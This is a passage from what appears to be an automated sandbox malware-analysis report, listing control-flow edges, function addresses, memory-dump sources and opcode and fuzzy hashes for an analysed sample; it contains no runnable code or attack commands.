7ffaacd02328-7ffaacd02339 897->899 898->858 900 7ffaacd02055 898->900 899->893 901 7ffaacd020d3-7ffaacd020d6 900->901 902 7ffaacd020d9-7ffaacd020e0 901->902 903 7ffaacd02057-7ffaacd0208c call 7ffaacd01ce0 902->903 904 7ffaacd020e6 902->904 903->893 912 7ffaacd02092-7ffaacd020a2 903->912 905 7ffaacd02156-7ffaacd0215d 904->905 907 7ffaacd020e8-7ffaacd0211a call 7ffaacd01ce0 905->907 908 7ffaacd0215f-7ffaacd021a5 905->908 907->893 915 7ffaacd02120-7ffaacd02148 907->915 923 7ffaacd01f74-7ffaacd01f78 908->923 924 7ffaacd021ab-7ffaacd021b0 908->924 912->858 914 7ffaacd020a8-7ffaacd020c5 912->914 914->893 917 7ffaacd020cb-7ffaacd020d0 914->917 915->893 918 7ffaacd0214e-7ffaacd02153 915->918 917->901 918->905 925 7ffaacd01fca 923->925 926 7ffaacd01f7a-7ffaacd02318 923->926 927 7ffaacd02236-7ffaacd0223a 924->927 925->895 928 7ffaacd021b5-7ffaacd021e4 call 7ffaacd01ce0 927->928 929 7ffaacd02240-7ffaacd02246 927->929 928->893 933 7ffaacd021ea-7ffaacd021fa 928->933 933->878 934 7ffaacd02200-7ffaacd0220f 933->934 934->893 935 7ffaacd02215-7ffaacd02228 934->935 935->902 936 7ffaacd0222e-7ffaacd02233 935->936 936->927
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem
                                                    • API String ID: 0-2156003729
                                                    • Opcode ID: 8de5cec29dab5bbcec48622f1cb14a5da55aa47e611025962dcbde6afc1637b2
                                                    • Instruction ID: f4597b177d0792b0cc2d68dca862196bb84065da8e683c66ec0c05c58bbc5cad
                                                    • Opcode Fuzzy Hash: 8de5cec29dab5bbcec48622f1cb14a5da55aa47e611025962dcbde6afc1637b2
                                                    • Instruction Fuzzy Hash: D0C1BF30A19546DBFB4DCF08C0D06B577A1FF46300B5485BDD86F8B68ACA38E889CB85
                                                    Function 00007FFAAC5EF9C0 Relevance: 1.6, Strings: 1, Instructions: 309COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5e5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )I_H
                                                    • API String ID: 0-3323003358
                                                    • Opcode ID: 618ae6ffad49c99657d49d92f2f46db8822b144f81d332634cf0b17166181f34
                                                    • Instruction ID: 9494cf6b4fac182f2e9d964f2f4b47a4118d0e0e41f33694365f2c01490a8947
                                                    • Opcode Fuzzy Hash: 618ae6ffad49c99657d49d92f2f46db8822b144f81d332634cf0b17166181f34
                                                    • Instruction Fuzzy Hash: 3DC1FA70E08A5D8FDB94EF68C894BA9B7B6FF59300F5081A9D40DE7291CF34A985CB40
                                                    Function 00007FFAACD016D8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 721e151c99124c3f3356cbca6aae843ebe25f653a5bfa079b17e97dd66ed2878
                                                    • Instruction ID: aeb963e619daf6fb52f8df83b3be3a5b70476c868bbff0748c7577de1d08defe
                                                    • Opcode Fuzzy Hash: 721e151c99124c3f3356cbca6aae843ebe25f653a5bfa079b17e97dd66ed2878
                                                    • Instruction Fuzzy Hash: D2514D70E1960AEFEB89DB98C4645FDB7B1FF45300F1481BED01EA7291CA34A905CB81
                                                    Function 00007FFAAC7601A9 Relevance: 1.4, APIs: 1, Instructions: 143COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1624746487.00007FFAAC750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC750000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac750000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: dac1ab36c4050b565bc914f933276487376f30542cb67446cc6378c0cfe272c3
                                                    • Instruction ID: 8f8d4d77711b289436ba3a9957be7208e943ffdefd05fec4cccbb3c48a9d2898
                                                    • Opcode Fuzzy Hash: dac1ab36c4050b565bc914f933276487376f30542cb67446cc6378c0cfe272c3
                                                    • Instruction Fuzzy Hash: 3C415B70D0864C8FDB59DFA8D888BEDBBF0FF56310F1041AAD049E7292DA349885CB41
                                                    Function 00007FFAACD0012D Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem
                                                    • API String ID: 0-2156003729
                                                    • Opcode ID: a31a4694b732bc88a67d79f88f7929fba687a323ee85ef643fb121dddca21ebd
                                                    • Instruction ID: c9302f8a5dc27c081f4c90c4b3d9604d2daae1e58d5e8900be0de7d0509689e9
                                                    • Opcode Fuzzy Hash: a31a4694b732bc88a67d79f88f7929fba687a323ee85ef643fb121dddca21ebd
                                                    • Instruction Fuzzy Hash: 43316171A1991AAFEB88DB5CD4915A8B7B1FF46310B50C13AD01FD7686CF24B816CBC1
                                                    Function 00007FFAACD001EA Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )rem
                                                    • API String ID: 0-2156003729
                                                    • Opcode ID: 9233589f2c417a11548de27f8cbaa7b417a60a086e712d73a44080513639021f
                                                    • Instruction ID: cd5dce3fb893b4d37c85c50f6e8f0d2ac8f4eb552424086f5eef71dbb3701627
                                                    • Opcode Fuzzy Hash: 9233589f2c417a11548de27f8cbaa7b417a60a086e712d73a44080513639021f
                                                    • Instruction Fuzzy Hash: BD31C471E1DA4AEFF788976C94516E8B7E1FF46310F104179D06FC7182DE18A8498681
                                                    Function 00007FFAAC5BAF17 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 7
                                                    • API String ID: 0-1790921346
                                                    • Opcode ID: 8e387a078d0f69c83a00816ade96501b7dcfdcad8193d2422d1aec56cc11c428
                                                    • Instruction ID: 6246a7349bfa3d4b880125c59bea5b2832671f23bc11c76b41929501a9b20370
                                                    • Opcode Fuzzy Hash: 8e387a078d0f69c83a00816ade96501b7dcfdcad8193d2422d1aec56cc11c428
                                                    • Instruction Fuzzy Hash: CEF01C60D4911B8AEB609B18C850FAE7A65AF45700F5082F4E00D9B687DF78A9898AC0
                                                    Function 00007FFAACD0C61C Relevance: 1.2, Instructions: 1243COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c0d86196cb537257194c359c33c400c908210c07fab11ad907775a978e45f0d1
                                                    • Instruction ID: 53a282aac64fd8e4c89da7b35bb67933afa90367d3a68260fb5ec957220e56ac
                                                    • Opcode Fuzzy Hash: c0d86196cb537257194c359c33c400c908210c07fab11ad907775a978e45f0d1
                                                    • Instruction Fuzzy Hash: 1EB24270A1492C8FDF99EF18C894FA9B7B1FB69305F1041D9910EE72A1DA31AE85CF40
                                                    Function 00007FFAACD0EF65 Relevance: .7, Instructions: 660COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a4320e888117cba565efb0fb32eb36722e02a0437567ec30021a28e0ba07fe6
                                                    • Instruction ID: 24bf5d3ee37dfff1ddfeef7373c75545b58e3879fe71e7ce008dc808a9354511
                                                    • Opcode Fuzzy Hash: 7a4320e888117cba565efb0fb32eb36722e02a0437567ec30021a28e0ba07fe6
                                                    • Instruction Fuzzy Hash: 58428570A1891D9FDFD9EB18C898BA9B7B1FB69301F1041E9D00EE7661CA35AD85CF40
                                                    Function 00007FFAACD0E060 Relevance: .5, Instructions: 527COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4b112c7a39b52c0d35698a680e5661002099039206de5c802a444dd5ceb395c7
                                                    • Instruction ID: 74195e153814c23da8bc28b9bee5ee9e9c76228b8c0895c49a848a414fec9b56
                                                    • Opcode Fuzzy Hash: 4b112c7a39b52c0d35698a680e5661002099039206de5c802a444dd5ceb395c7
                                                    • Instruction Fuzzy Hash: A4224174A5492C9FDFD9EF18C898BA9B7B1FB69305F1041D9900EE7661CA31AE81CF40
                                                    Function 00007FFAACD0F027 Relevance: .5, Instructions: 486COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 289669de06fac9938deb46fbfa08f60c0dfdea0f898b3891785d2a65ebe7cceb
                                                    • Instruction ID: fb694fb618762b6a6544e26f044d68393e4076519125f609cef7e679add1a9d2
                                                    • Opcode Fuzzy Hash: 289669de06fac9938deb46fbfa08f60c0dfdea0f898b3891785d2a65ebe7cceb
                                                    • Instruction Fuzzy Hash: 38029870A1891D9FDFD8EB18C898BA977F1FB69305F1041A9D00EE72A1DA35AD85CF40
                                                    Function 00007FFAACD0E730 Relevance: .3, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fccb8c0c5c705e81994d79e310ec640a872be93267e0bfcd75e11ff735a49194
                                                    • Instruction ID: 20c37a404c486fe846afe94076ed4da8c2dd69a454d93c10693a5f6efb6df879
                                                    • Opcode Fuzzy Hash: fccb8c0c5c705e81994d79e310ec640a872be93267e0bfcd75e11ff735a49194
                                                    • Instruction Fuzzy Hash: 7BD18330A1892C9FDFE9EF18C894BA977B5FB69305F1041D9900EE7661CA31AE85CF40
                                                    Function 00007FFAACD11B79 Relevance: .3, Instructions: 293COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 093cebc4d7728434bfcd1b202494498976b2b7c223ed39c8bceabc3f7c130980
                                                    • Instruction ID: 3f238936b122632bf2536815914f885700f096f5f78e24b740d9eab444176acb
                                                    • Opcode Fuzzy Hash: 093cebc4d7728434bfcd1b202494498976b2b7c223ed39c8bceabc3f7c130980
                                                    • Instruction Fuzzy Hash: 0B81F272B1DE098FEF99EB5C94556A8B7E1EF6A341B04417ED00ED7292DE20EC4687C0
                                                    Function 00007FFAACD10F48 Relevance: .3, Instructions: 273COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a88385343091e348e8dc0ce1131219af79e4dcb7fadd592f6c48c87097efe35e
                                                    • Instruction ID: 08d1cd522ac9ceb3aac2df625c75c0ffe18e5eeaa3bbd8939198f69a727af354
                                                    • Opcode Fuzzy Hash: a88385343091e348e8dc0ce1131219af79e4dcb7fadd592f6c48c87097efe35e
                                                    • Instruction Fuzzy Hash: 0471A27171DA0A8FEA58EB18D4419B5B3E1FFA9310B10827ED05EC3A96DE25FC4687C4
                                                    Function 00007FFAACD06321 Relevance: .3, Instructions: 269COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d4df97a64b7864b2578aa7d8ddc686a3e200f6cf1a8fec1b652f85d94e3f3ef
                                                    • Instruction ID: b17a233202c8d1475b9afaa6c2ce25fa3cbe8c2bf420f85cdaae678bb2d4a273
                                                    • Opcode Fuzzy Hash: 2d4df97a64b7864b2578aa7d8ddc686a3e200f6cf1a8fec1b652f85d94e3f3ef
                                                    • Instruction Fuzzy Hash: 50911974908A1D8FDB98DF58C845BE9BBF1FB69310F1082AAD40DE3255CB74A985CF81
                                                    Function 00007FFAACD11B9B Relevance: .2, Instructions: 224COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37fa664bccb8ac6fa8466742506453259790c8a9a0cd0a7a3f45976ded9a6793
                                                    • Instruction ID: 608a5d763ba41f030414fc1b8f8c3d404984f19f771d8ab41724d86269794fad
                                                    • Opcode Fuzzy Hash: 37fa664bccb8ac6fa8466742506453259790c8a9a0cd0a7a3f45976ded9a6793
                                                    • Instruction Fuzzy Hash: 5C518F71A19E0D8FEF98EB58D455AA8B7E1EF6A301F04426ED40DD7292DE20EC45CBC1
                                                    Function 00007FFAACD11F89 Relevance: .2, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7a980eaa2e580b516c0ce051029667a7c1b68f5a008da0fcf174fee81e6d07b0
                                                    • Instruction ID: d1e377f2c6faad91dceb72d15c5e0012d906e16f16ed0d7a604509634f6120b7
                                                    • Opcode Fuzzy Hash: 7a980eaa2e580b516c0ce051029667a7c1b68f5a008da0fcf174fee81e6d07b0
                                                    • Instruction Fuzzy Hash: 8A51B031B19A0A8FEB69EB18C441976B3E1FF69310714827AD05EC7696DE35FC4687C0
                                                    Function 00007FFAAC5B08E8 Relevance: .2, Instructions: 208COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4920d665c43d31477a1691ca0d4d1dbef06c5c50fd605fde3bc71515adfc3048
                                                    • Instruction ID: f33462cb623bbe7615f92ae3b9632697b19d8a53f596b45bc70ddab91c98f77d
                                                    • Opcode Fuzzy Hash: 4920d665c43d31477a1691ca0d4d1dbef06c5c50fd605fde3bc71515adfc3048
                                                    • Instruction Fuzzy Hash: 7D71297190961A9FDF44EFA8D494AED7BE0EF59324F05417AE44DD7262DA34E880CB80
                                                    Function 00007FFAACD0C3C2 Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7619a1503f9ed64a9995b7106de6f1fe729514737fdfba47440a942a206bc8c
                                                    • Instruction ID: 0416be84834542bc3bd230e17af61ab97194010b4d8620a8ed50669396451609
                                                    • Opcode Fuzzy Hash: b7619a1503f9ed64a9995b7106de6f1fe729514737fdfba47440a942a206bc8c
                                                    • Instruction Fuzzy Hash: CA71987094891D8FDF99EB18C898BA8B7F1FB69301F1441E9D00EE7661CA31AE85CF41
                                                    Function 00007FFAACD01CE0 Relevance: .2, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c86c15d5dde61750b13f354c5c9750143bc435b1b5a58719579d895f655bd06b
                                                    • Instruction ID: f306407b2973cd525033c83fd6e03e4a1ad2553afb41786940102de7c53b0899
                                                    • Opcode Fuzzy Hash: c86c15d5dde61750b13f354c5c9750143bc435b1b5a58719579d895f655bd06b
                                                    • Instruction Fuzzy Hash: AA510330E1D65A9FFBA8972C84257F877A1FF56300F1081BDD05FC7582CE28A9888781
                                                    Function 00007FFAAC5B08D0 Relevance: .2, Instructions: 179COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8da5217dce4006820d2a2bec3914301458f97ef597f1de9a112af40398e0db39
                                                    • Instruction ID: 265a5459642022299dbce09485194eaede193f25df8571f884be4d8df87d3265
                                                    • Opcode Fuzzy Hash: 8da5217dce4006820d2a2bec3914301458f97ef597f1de9a112af40398e0db39
                                                    • Instruction Fuzzy Hash: DF516B71D0855E8FEB44EFA8D495AED7BA0EF49314F14817AE44ED72A3DE38A841C780
                                                    Function 00007FFAAC5E5000 Relevance: .2, Instructions: 162COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5E5000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5e5000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4d78d190ae2df9ff1a06c1e02ba0a7dde5c4c57b5aa8e8f0ad48ed69e9dbef2
                                                    • Instruction ID: fcf67ca3d40eca18baba5f70765daaebf02be018acc9942b645f516322de4e1b
                                                    • Opcode Fuzzy Hash: f4d78d190ae2df9ff1a06c1e02ba0a7dde5c4c57b5aa8e8f0ad48ed69e9dbef2
                                                    • Instruction Fuzzy Hash: 8A51D27188F3C65FE7178B305C620E53FB49F13215B1E81EBE488CA4A3D61D559AC3A2
                                                    Function 00007FFAACD0FDB9 Relevance: .2, Instructions: 157COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c34fd6033cb1e5355ae735bdcdd002edb437f0c2e56623081b738dfaccb758fb
                                                    • Instruction ID: 04d33f42b44907011000c9feb974ae7294b5b99e5da765d12b7778602f8b9421
                                                    • Opcode Fuzzy Hash: c34fd6033cb1e5355ae735bdcdd002edb437f0c2e56623081b738dfaccb758fb
                                                    • Instruction Fuzzy Hash: B451A230A1891D8FDFA5EB18C894BA877B1EB69305F1041E9900EE72A1DA35AD85CF40
                                                    Function 00007FFAACD11811 Relevance: .2, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2ac6c487ad6fa231a0da9f3b3598edf44bedd19b9cdc9bb71a7deb7ce24e9433
                                                    • Instruction ID: 6c89318bcbfa5d82377aa511658e5fbdeabd466005a104c7652486c59c4be8dd
                                                    • Opcode Fuzzy Hash: 2ac6c487ad6fa231a0da9f3b3598edf44bedd19b9cdc9bb71a7deb7ce24e9433
                                                    • Instruction Fuzzy Hash: 4541C16171EB8A8FFB99976884246B5ABE1EF56340B0480FED05EC7197DE18E80983D1
                                                    Function 00007FFAAC5B0960 Relevance: .1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1621537600.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaac5b0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 838a5b54216c4b5f34909dd4ecec7cdece1ae8bca8044a26810899d8b3bf3cba
                                                    • Instruction ID: 9aaebb6a73b7d4273605f3efb25cb68b39e3f1e5f8bffc2ed5ef862acde3852f
                                                    • Opcode Fuzzy Hash: 838a5b54216c4b5f34909dd4ecec7cdece1ae8bca8044a26810899d8b3bf3cba
                                                    • Instruction Fuzzy Hash: 6A415E71D1895E8FEB44FFA8D495AED77A1FF58314F10417AE40EE3252DE38A8418B80
                                                    Function 00007FFAACD02FB7 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db0f79d4261ede784884e25e1fc20896a3c25952a2b27dcdcc5c93aca21b37f4
                                                    • Instruction ID: 8fb3fe4e0fc4701729472bb6c49b91affc8b85f695caed70d8a784b854b2cee8
                                                    • Opcode Fuzzy Hash: db0f79d4261ede784884e25e1fc20896a3c25952a2b27dcdcc5c93aca21b37f4
                                                    • Instruction Fuzzy Hash: FA415C7160CA099FDF88EB6CC495EB4B7E1FFA9310B0441AED05EC3692DE25E945CB81
                                                    Function 00007FFAACD03061 Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 77a6225677273250d6942b5de3f31354d65af7beae1692375d28c2c1c8734dd7
                                                    • Instruction ID: 893ccad054684f93b7926d2c9a164af0a5cfdc7bee43cdfbc1d3ea19aae73098
                                                    • Opcode Fuzzy Hash: 77a6225677273250d6942b5de3f31354d65af7beae1692375d28c2c1c8734dd7
                                                    • Instruction Fuzzy Hash: BB319C71608A488FDB99EB2CC4A5E7477E1FFA9310B0442AED05EC7692CE24E845CB81
                                                    Function 00007FFAACD1128E Relevance: .1, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.1634040169.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_7ffaacd00000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d59055230d01c108e9810a1bb9ae18c03c8226d2276ac0837752c22691a6e83
                                                    • Instruction ID: 5a46ce5ee6798387e72c921d6dc7b10daec08c3121e1e1ab11b7378b9333c865
                                                    • Opcode Fuzzy Hash: 3d59055230d01c108e9810a1bb9ae18c03c8226d2276ac0837752c22691a6e83
                                                    • Instruction Fuzzy Hash: 534190B1D1CA9DCEEB98EB9884597B8BBF1FB65300F04417DD00DD7692CA74A8848B81
                                                    Function 00007FFAACD02FFB Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
